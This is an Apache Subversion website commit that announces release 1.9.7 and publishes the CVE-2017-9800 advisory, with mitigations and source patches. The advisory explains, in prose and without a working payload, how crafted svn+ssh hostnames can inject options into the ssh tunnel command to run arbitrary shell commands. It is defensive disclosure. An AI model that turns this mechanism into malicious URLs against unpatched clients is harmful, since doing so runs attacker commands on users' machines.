You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@subversion.apache.org by da...@apache.org on 2017/08/10 18:04:00 UTC
svn commit: r1804690 - in /subversion/site/publish: doap.rdf
docs/release-notes/release-history.html index.html news.html
security/CVE-2017-9800-advisory.txt security/CVE-2017-9800-advisory.txt.asc
security/index.html site-nav.html
Author: danielsh
Date: Thu Aug 10 18:04:00 2017
New Revision: 1804690
URL: http://svn.apache.org/viewvc?rev=1804690&view=rev
Log:
Release Subversion 1.9.7 with a fix for CVE-2017-9800.
Added:
subversion/site/publish/security/CVE-2017-9800-advisory.txt
subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc
Modified:
subversion/site/publish/doap.rdf
subversion/site/publish/docs/release-notes/release-history.html
subversion/site/publish/index.html
subversion/site/publish/news.html
subversion/site/publish/security/index.html
subversion/site/publish/site-nav.html
Modified: subversion/site/publish/doap.rdf
URL: http://svn.apache.org/viewvc/subversion/site/publish/doap.rdf?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/doap.rdf (original)
+++ subversion/site/publish/doap.rdf Thu Aug 10 18:04:00 2017
@@ -37,8 +37,8 @@
<release>
<Version>
<name>Recommended current 1.9 release</name>
- <created>2017-07-06</created>
- <revision>1.9.6</revision>
+ <created>2017-08-10</created>
+ <revision>1.9.7</revision>
</Version>
</release>
<release>
Modified: subversion/site/publish/docs/release-notes/release-history.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/docs/release-notes/release-history.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/docs/release-notes/release-history.html (original)
+++ subversion/site/publish/docs/release-notes/release-history.html Thu Aug 10 18:04:00 2017
@@ -31,6 +31,9 @@ Subversion 2.0.</p>
<ul>
<li>
+ <b>Subversion 1.9.7</b> (Thursday, 10 August 2017): Security release.
+ </li>
+ <li>
<b>Subversion 1.8.18</b> (Friday, 07 July 2017): Bugfix release.
</li>
<li>
Modified: subversion/site/publish/index.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/index.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/index.html (original)
+++ subversion/site/publish/index.html Thu Aug 10 18:04:00 2017
@@ -64,6 +64,26 @@
<!-- In general, we'll keep only the most recent 3 or 4 news items here. -->
+<div class="h3" id="news-20170810-1">
+<h3>2017-08-09 — Apache Subversion 1.9.7 Released
+ <a class="sectionlink" href="#news-20170810-1"
+ title="Link to this section">¶</a>
+</h3>
+
+<p>We are pleased to announce the release of Apache Subversion 1.9.7.
+ This is the most complete Subversion release to date, and we encourage
+ users of Subversion to upgrade as soon as reasonable.
+ Please see the
+ <a href="https://mail-archives.apache.org/mod_mbox/subversion-announce/201708.mbox/%3C2fefe468-7d41-11e7-aea1-9312c6089150%40apache.org%3E"
+ >release announcement</a> and the
+ <a href="http://svn.apache.org/repos/asf/subversion/tags/1.9.7/CHANGES"
+ >change log</a> for more information about this release.</p>
+
+<p>To get this release from the nearest mirror, please visit our
+ <a href="/download.cgi?update=201708081800#recommended-release">download page</a>.</p>
+
+</div> <!-- #news-20170810-1 -->
+
<div class="h3" id="news-20170726">
<h3>2017-07-26 — Apache Subversion 1.10.0-alpha3 Released
<a class="sectionlink" href="#news-20170726"
@@ -106,33 +126,6 @@
</div> <!-- #news-20170707 -->
-<div class="h3" id="news-20170706">
-<h3>2017-07-06 — Apache Subversion 1.9.6 Released
- <a class="sectionlink" href="#news-20170706"
- title="Link to this section">¶</a>
-</h3>
-
-<p>We are pleased to announce the release of Apache Subversion 1.9.6.
- This is the most complete Subversion release to date, and we encourage
- users of Subversion to upgrade as soon as reasonable. Please see the
- <a href="https://mail-archives.apache.org/mod_mbox/subversion-announce/201707.mbox/%3C20170706103910.s2fibubji2orhfcs%40tarpaulin.shahaf.local2%3E"
- >release announcement</a> and the
- <a href="http://svn.apache.org/repos/asf/subversion/tags/1.9.6/CHANGES"
- >change log</a> for more information about this release.</p>
-
-<p>This release fixes a bug where a repository would fail to store two files having
- <a href="http://shattered.io/">identical SHA-1 checksums</a>.
- Further information is available
- <a href="/docs/release-notes/1.9#shattered-sha1"
- >in the 1.9.x series release notes</a>
- and in a
- <a href="/faq#shattered-sha1">new FAQ entry</a>.</p>
-
-<p>To get this release from the nearest mirror, please visit our
- <a href="/download.cgi#recommended-release">download page</a>.</p>
-
-</div> <!-- #news-20170706 -->
-
<p style="font-style: italic; text-align:
right;">[Click <a href="/news.html">here</a> to see all News
items.]</p>
Modified: subversion/site/publish/news.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/news.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/news.html (original)
+++ subversion/site/publish/news.html Thu Aug 10 18:04:00 2017
@@ -22,6 +22,26 @@
<!-- Maybe we could insert H2's to split up the news items by -->
<!-- calendar year if we felt the need to do so. -->
+<div class="h3" id="news-20170810-1">
+<h3>2017-08-09 — Apache Subversion 1.9.7 Released
+ <a class="sectionlink" href="#news-20170810-1"
+ title="Link to this section">¶</a>
+</h3>
+
+<p>We are pleased to announce the release of Apache Subversion 1.9.7.
+ This is the most complete Subversion release to date, and we encourage
+ users of Subversion to upgrade as soon as reasonable.
+ Please see the
+ <a href="https://mail-archives.apache.org/mod_mbox/subversion-announce/201708.mbox/%3C2fefe468-7d41-11e7-aea1-9312c6089150%40apache.org%3E"
+ >release announcement</a> and the
+ <a href="http://svn.apache.org/repos/asf/subversion/tags/1.9.7/CHANGES"
+ >change log</a> for more information about this release.</p>
+
+<p>To get this release from the nearest mirror, please visit our
+ <a href="/download.cgi?update=201708081800#recommended-release">download page</a>.</p>
+
+</div> <!-- #news-20170810-1 -->
+
<div class="h3" id="news-20170726">
<h3>2017-07-26 — Apache Subversion 1.10.0-alpha3 Released
<a class="sectionlink" href="#news-20170726"
Added: subversion/site/publish/security/CVE-2017-9800-advisory.txt
URL: http://svn.apache.org/viewvc/subversion/site/publish/security/CVE-2017-9800-advisory.txt?rev=1804690&view=auto
==============================================================================
--- subversion/site/publish/security/CVE-2017-9800-advisory.txt (added)
+++ subversion/site/publish/security/CVE-2017-9800-advisory.txt Thu Aug 10 18:04:00 2017
@@ -0,0 +1,379 @@
+ Arbitrary code execution on clients through malicious svn+ssh URLs in
+ svn:externals and svn:sync-from-url
+
+Summary:
+========
+
+ A Subversion client sometimes connects to URLs provided by the repository.
+ This happens in two primary cases: during 'checkout', 'export', 'update', and
+ 'switch', when the tree being downloaded contains svn:externals properties;
+ and when using 'svnsync sync' with one URL argument.
+
+ A maliciously constructed svn+ssh:// URL would cause Subversion clients to
+ run an arbitrary shell command. Such a URL could be generated by a malicious
+ server, by a malicious user committing to a honest server (to attack another
+ user of that server's repositories), or by a proxy server.
+
+ The vulnerability affects all clients, including those that use file://,
+ http://, and plain (untunneled) svn://.
+
+ An exploit has been tested.
+
+Known vulnerable:
+=================
+
+ Subversion clients 1.0.0 through 1.8.18 (inclusive)
+ Subversion clients 1.9.0 through 1.9.6 (inclusive)
+ Subversion client 1.10.0-alpha3
+
+ Subversion 1.10.0-alpha1 and 1.10.0-alpha2 are vulnerable,
+ however, were never publicly released.
+
+Known fixed:
+============
+
+ Subversion 1.8.19
+ Subversion 1.9.7
+
+ Patches are available for 1.9, 1.8, 1.6. The patch for 1.9 applies
+ to 1.10.0-alpha3 with an offset. The patch for 1.8 applies to 1.7
+ with an offset.
+
+ Clients that do not have access to an ssh client, and have no custom tunnels
+ configured in their runtime configuration area [1], are not vulnerable.
+
+ Clients using Subversion's own runtime module loading for Repository Access
+ (RA) modules are not vulnerable if the 'libsvn_ra_svn' module, which provides
+ support for the svn+ssh:// and svn:// protocols is removed.
+
+ [1] http://svnbook.red-bean.com/en/1.7/svn.advanced.confarea.html#svn.advanced.confarea.layout
+ This link describes Subversion 1.7, but the description is correct for
+ all other versions as well.
+
+Details:
+========
+
+ (see "Summary:" above)
+
+Severity:
+=========
+
+ CVSSv3 Base Score: 9.9 (Critical)
+ CVSSv3 Base Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C
+
+ A successful exploit will run an arbitrary shell command with the privileges
+ of the Subversion client.
+
+Recommendations:
+================
+
+ Several alternative ways to fix the issue are available. Any one of #1, #2,
+ #3, and #4 fixes the issue completely. There is no need to implement more
+ than one of these four options.
+
+ 1. We recommend all users to upgrade to Subversion 1.9.7 or 1.8.19. New
+ Subversion source and binary packages can be found at:
+ https://subversion.apache.org/download
+ https://subversion.apache.org/packages
+
+ 2. Users of Subversion 1.8.x and 1.9.x who are unable to upgrade may apply
+ the included patch.
+
+ 3. Clients that are not able to execute the 'ssh' command are not vulnerable.
+ Note, however, that the name of the command may be changed by setting the
+ $SVN_SSH environment variable or by setting a value for the 'ssh' key
+ in the "[tunnels]" section of the file "config" in the runtime configuration
+ area [1]. Moreover, the "[tunnels]" section may define additional tunnels;
+ those may be vulnerable if they do not perform input validation on their
+ first argument, which contains the hostname to connect to.
+
+ By default, only the "ssh" tunnel is available. It is available even if it
+ is commented out in the file "config". The default definition of the "ssh"
+ tunnel is equivalent to:
+ ssh = $SVN_SSH ssh -q
+ If that line is not commented out and not set to the default, audit that line
+ as explained below for additional/custom tunnels. If that line is commented
+ out or set to the default, two different fixes are available: either
+ uncomment that line and change the setting to
+ ssh = $SVN_SSH ssh -q --
+ or set the environment variable "SVN_SSH" to the value "ssh -q --".
+
+ Custom tunnels are invoked with three arguments: the hostname to connect to,
+ the string "svnserve" and the string "-t". It is recommended that custom
+ tunnel definitions be audited for correct handling of unusual or invalid
+ host values; the Subversion libraries perform some basic validation,
+ but cannot guarantee correct quoting/escaping of the parameters to
+ arbitrary third-party tunnel commands.
+
+ 4. Clients built to use Subversion's own runtime mechanism for loading
+ modules can remove the libsvn_ra_svn shared module and thus remove the
+ threat. The svn:// and svn+ssh:// protocols will no longer be available.
+ This does not apply to clients built to use the normal compile-time linking
+ of shared libraries: those clients will fail to start if the libsvn_ra_svn
+ shared module is removed. Subversion's own runtime loading mechanism is
+ enabled at build-time by using --enable-runtime-module-search.
+
+ 5. Users of 'svnsync sync' should use the two-URL-arguments form of the
+ command. The current remote URL may be found by either of these two commands:
+ svnsync info -- $DEST_URL
+ svn proplist --verbose --revision=0 -- $DEST_URL
+ where $DEST_URL is the (first, or only) URL argument to 'svnsync sync'.
+ Then, change the svnsync invocation to always pass that URL as an additional
+ argument: change
+ svnsync sync URL/to/sync
+ to
+ svnsync sync URL/to/sync URL/to/source
+ NOTE: This recommendation applies only to 'svnsync sync' and does not fix
+ the 'checkout' / 'update' part of the issue.
+
+ 6. Server administrators may wish to install a 'pre-commit' hook that
+ rejects commits that add invalid svn+*:// URLs, in order to protect their
+ users from other (malicious) users committing such URLs.
+
+ 7. API consumers that implement a 'svn_ra_open_tunnel_func_t open_tunnel_func'
+ callback should audit it for issues similar to this one.
+
+ 8. Subversion 1.7 and 1.6 are officially no longer supported. The
+ patch for 1.8 will apply to 1.7 and a patch for 1.6 is available,
+ the patch for 1.6 could be adapted to even older versions. Since
+ 1.7 and 1.6 are no longer supported there will be no official
+ releases of those branches for this vulnerablity.
+
+ [1] http://svnbook.red-bean.com/en/1.7/svn.advanced.confarea.html#svn.advanced.confarea.layout
+ This link describes Subversion 1.7, but the description is correct for
+ all other versions as well.
+
+References:
+===========
+
+ CVE-2017-9800 (Subversion)
+ CVE-2017-12426 (GitLab)
+ CVE-2017-1000116 (Mercurial (hg))
+ CVE-2017-1000117 (Git)
+
+Reported by:
+============
+
+ Jonathan Nieder
+
+ Discovered by Joern Schneeweisz of Recurity Labs.
+
+Patches:
+========
+
+ Patch for Subversion 1.9.6:
+[[[
+Index: subversion/libsvn_ra_svn/client.c
+===================================================================
+--- subversion/libsvn_ra_svn/client.c (revision 1803926)
++++ subversion/libsvn_ra_svn/client.c (working copy)
+@@ -46,6 +46,7 @@
+ #include "svn_props.h"
+ #include "svn_mergeinfo.h"
+ #include "svn_version.h"
++#include "svn_ctype.h"
+
+ #include "svn_private_config.h"
+
+@@ -396,7 +397,7 @@
+ * versions have it too. If the user is using some other ssh
+ * implementation that doesn't accept it, they can override it
+ * in the [tunnels] section of the config. */
+- val = "$SVN_SSH ssh -q";
++ val = "$SVN_SSH ssh -q --";
+ }
+
+ if (!val || !*val)
+@@ -441,7 +442,7 @@
+ for (n = 0; cmd_argv[n] != NULL; n++)
+ argv[n] = cmd_argv[n];
+
+- argv[n++] = svn_path_uri_decode(hostinfo, pool);
++ argv[n++] = hostinfo;
+ argv[n++] = "svnserve";
+ argv[n++] = "-t";
+ argv[n] = NULL;
+@@ -802,7 +803,33 @@
+ }
+
+
++/* A simple whitelist to ensure the following are valid:
++ * user@server
++ * [::1]:22
++ * server-name
++ * server_name
++ * 127.0.0.1
++ * with an extra restriction that a leading '-' is invalid.
++ */
++static svn_boolean_t
++is_valid_hostinfo(const char *hostinfo)
++{
++ const char *p = hostinfo;
+
++ if (p[0] == '-')
++ return FALSE;
++
++ while (*p)
++ {
++ if (!svn_ctype_isalnum(*p) && !strchr(":.-_[]@", *p))
++ return FALSE;
++
++ ++p;
++ }
++
++ return TRUE;
++}
++
+ static svn_error_t *ra_svn_open(svn_ra_session_t *session,
+ const char **corrected_url,
+ const char *url,
+@@ -835,8 +862,18 @@
+ || (callbacks->check_tunnel_func && callbacks->open_tunnel_func
+ && !callbacks->check_tunnel_func(callbacks->tunnel_baton,
+ tunnel))))
+- SVN_ERR(find_tunnel_agent(tunnel, uri.hostinfo, &tunnel_argv, config,
+- result_pool));
++ {
++ const char *decoded_hostinfo;
++
++ decoded_hostinfo = svn_path_uri_decode(uri.hostinfo, result_pool);
++
++ if (!is_valid_hostinfo(decoded_hostinfo))
++ return svn_error_createf(SVN_ERR_BAD_URL, NULL, _("Invalid host '%s'"),
++ uri.hostinfo);
++
++ SVN_ERR(find_tunnel_agent(tunnel, decoded_hostinfo, &tunnel_argv,
++ config, result_pool));
++ }
+ else
+ tunnel_argv = NULL;
+
+Index: subversion/libsvn_subr/config_file.c
+===================================================================
+--- subversion/libsvn_subr/config_file.c (revision 1803926)
++++ subversion/libsvn_subr/config_file.c (working copy)
+@@ -1248,12 +1248,12 @@
+ "### passed to the tunnel agent as <user>@<hostname>.) If the" NL
+ "### built-in ssh scheme were not predefined, it could be defined" NL
+ "### as:" NL
+- "# ssh = $SVN_SSH ssh -q" NL
++ "# ssh = $SVN_SSH ssh -q --" NL
+ "### If you wanted to define a new 'rsh' scheme, to be used with" NL
+ "### 'svn+rsh:' URLs, you could do so as follows:" NL
+- "# rsh = rsh" NL
++ "# rsh = rsh --" NL
+ "### Or, if you wanted to specify a full path and arguments:" NL
+- "# rsh = /path/to/rsh -l myusername" NL
++ "# rsh = /path/to/rsh -l myusername --" NL
+ "### On Windows, if you are specifying a full path to a command," NL
+ "### use a forward slash (/) or a paired backslash (\\\\) as the" NL
+ "### path separator. A single backslash will be treated as an" NL
+]]]
+
+ Patch for Subversion 1.8.18
+[[[
+Index: subversion/libsvn_ra_svn/client.c
+===================================================================
+--- subversion/libsvn_ra_svn/client.c (revision 1803926)
++++ subversion/libsvn_ra_svn/client.c (working copy)
+@@ -46,6 +46,7 @@
+ #include "svn_props.h"
+ #include "svn_mergeinfo.h"
+ #include "svn_version.h"
++#include "svn_ctype.h"
+
+ #include "svn_private_config.h"
+
+@@ -395,7 +396,7 @@
+ * versions have it too. If the user is using some other ssh
+ * implementation that doesn't accept it, they can override it
+ * in the [tunnels] section of the config. */
+- val = "$SVN_SSH ssh -q";
++ val = "$SVN_SSH ssh -q --";
+ }
+
+ if (!val || !*val)
+@@ -435,7 +436,7 @@
+ ;
+ *argv = apr_palloc(pool, (n + 4) * sizeof(char *));
+ memcpy((void *) *argv, cmd_argv, n * sizeof(char *));
+- (*argv)[n++] = svn_path_uri_decode(hostinfo, pool);
++ (*argv)[n++] = hostinfo;
+ (*argv)[n++] = "svnserve";
+ (*argv)[n++] = "-t";
+ (*argv)[n] = NULL;
+@@ -716,7 +717,33 @@
+ }
+
+
++/* A simple whitelist to ensure the following are valid:
++ * user@server
++ * [::1]:22
++ * server-name
++ * server_name
++ * 127.0.0.1
++ * with an extra restriction that a leading '-' is invalid.
++ */
++static svn_boolean_t
++is_valid_hostinfo(const char *hostinfo)
++{
++ const char *p = hostinfo;
+
++ if (p[0] == '-')
++ return FALSE;
++
++ while (*p)
++ {
++ if (!svn_ctype_isalnum(*p) && !strchr(":.-_[]@", *p))
++ return FALSE;
++
++ ++p;
++ }
++
++ return TRUE;
++}
++
+ static svn_error_t *ra_svn_open(svn_ra_session_t *session,
+ const char **corrected_url,
+ const char *url,
+@@ -740,8 +767,17 @@
+ parse_tunnel(url, &tunnel, pool);
+
+ if (tunnel)
+- SVN_ERR(find_tunnel_agent(tunnel, uri.hostinfo, &tunnel_argv, config,
+- pool));
++ {
++ const char *decoded_hostinfo;
++
++ decoded_hostinfo = svn_path_uri_decode(uri.hostinfo, pool);
++ if (!is_valid_hostinfo(decoded_hostinfo))
++ return svn_error_createf(SVN_ERR_BAD_URL, NULL, _("Invalid host '%s'"),
++ uri.hostinfo);
++
++ SVN_ERR(find_tunnel_agent(tunnel, decoded_hostinfo, &tunnel_argv,
++ config, pool));
++ }
+ else
+ tunnel_argv = NULL;
+
+Index: subversion/libsvn_subr/config_file.c
+===================================================================
+--- subversion/libsvn_subr/config_file.c (revision 1803926)
++++ subversion/libsvn_subr/config_file.c (working copy)
+@@ -1134,12 +1134,12 @@
+ "### passed to the tunnel agent as <user>@<hostname>.) If the" NL
+ "### built-in ssh scheme were not predefined, it could be defined" NL
+ "### as:" NL
+- "# ssh = $SVN_SSH ssh -q" NL
++ "# ssh = $SVN_SSH ssh -q --" NL
+ "### If you wanted to define a new 'rsh' scheme, to be used with" NL
+ "### 'svn+rsh:' URLs, you could do so as follows:" NL
+- "# rsh = rsh" NL
++ "# rsh = rsh --" NL
+ "### Or, if you wanted to specify a full path and arguments:" NL
+- "# rsh = /path/to/rsh -l myusername" NL
++ "# rsh = /path/to/rsh -l myusername --" NL
+ "### On Windows, if you are specifying a full path to a command," NL
+ "### use a forward slash (/) or a paired backslash (\\\\) as the" NL
+ "### path separator. A single backslash will be treated as an" NL
+]]]
Added: subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc
URL: http://svn.apache.org/viewvc/subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc?rev=1804690&view=auto
==============================================================================
--- subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc (added)
+++ subversion/site/publish/security/CVE-2017-9800-advisory.txt.asc Thu Aug 10 18:04:00 2017
@@ -0,0 +1,16 @@
+-----BEGIN PGP SIGNATURE-----
+
+iQIrBAABCAAdFiEEbrYLY3zlrL8kSaLa2yfpl0Ka8gwFAlmLcx0ACgkQ2yfpl0Ka
+8gy+lA+6A5G8S1NPrlWhu6Y3DpKimx7Wk7gF9XvRRJLqNTFP9ZqN+3M9ucRYWQK1
+6y0xscHKtdSiTiqEDzvNKAAkcHm+ZemU0YDt7OyR2SYORgJfUlmWPaM7G26eTWj/
+3pX02JubRK+ggY9p302/QvKJnWvssdg4r4VQGIpSYwmM59glBrHVgbrcNtpggc4V
+4irxuTmmidjFLSHdggJHYWPIoYlp3glYOAddDyRCIDtb7yigf1p/rNHFD8IGw9lH
+CiN+gcgl+wDSxgQWKKJTjQwnocGl2EmpSqu3Gxz3R+STWiCeaVwyAUGS7z/26CKP
+8gE+ZW51nQx9tDvfQaKMOz1/Zm+EJ0FFJH0ZRKCD+FHpszR6Po+qMSZM/TMaOmc2
+/ugoDf1sGp/tvVHx2lwwlfwKsWDW21lCUDegB8nFcVB9PTPnZ4VlOBP91pggKop3
+k5epgWqf2+mVv9cW8T5HSwqvh0J1hzOfa5d2Ez6UGbtg3oJi0pBrPLbZEXgYgEdM
+wPQ0QrjPmIxV1OxuJjJ2ZR3ot/Vxbh40dD1toVLUIek4BKZXj4d99h7C68x82EwD
+CdhYQ6eJl4IfQHc7U+r/nIvga9Mu9X9LFdL2Cx4WBS/iKBDhYPtbqhtEww8ibFir
+Ox0RrSIK0cYlbq07f3whmuQ55O2eYUGhZh+oKtoT
+=GRyz
+-----END PGP SIGNATURE-----
Modified: subversion/site/publish/security/index.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/security/index.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/security/index.html (original)
+++ subversion/site/publish/security/index.html Thu Aug 10 18:04:00 2017
@@ -274,6 +274,15 @@ clients using http(s)://</td>
<td>1.1.0-1.8.17 and 1.9.0-1.9.5</td>
<td>Apache Subversion is unable to store SHA1 collisions.</td>
</tr>
+
+<tr>
+<td><a href="CVE-2017-9800-advisory.txt">CVE-2017-9800-advisory.txt</a>
+[<a href="CVE-2017-9800-advisory.txt.asc">PGP</a>]</td>
+<td>1.0.0-1.8.18 and 1.9.0-1.9.6 and 1.10.0-alpha1-1.10.0-alpha3</td>
+<td>Arbitrary code execution on clients through malicious svn+ssh URLs in
+ svn:externals and svn:sync-from-url</td>
+</tr>
+
</tbody>
</table>
Modified: subversion/site/publish/site-nav.html
URL: http://svn.apache.org/viewvc/subversion/site/publish/site-nav.html?rev=1804690&r1=1804689&r2=1804690&view=diff
==============================================================================
--- subversion/site/publish/site-nav.html (original)
+++ subversion/site/publish/site-nav.html Thu Aug 10 18:04:00 2017
@@ -14,7 +14,7 @@
</li>
<li>Getting Subversion
<ul>
- <li><a href="/download.cgi">Source Download</a></li>
+ <li><a href="/download.cgi?update=201708081800">Source Download</a></li>
<li><a href="/packages.html">Binary Packages</a></li>
<li><a href="/docs/release-notes/">Release Notes</a></li>
</ul>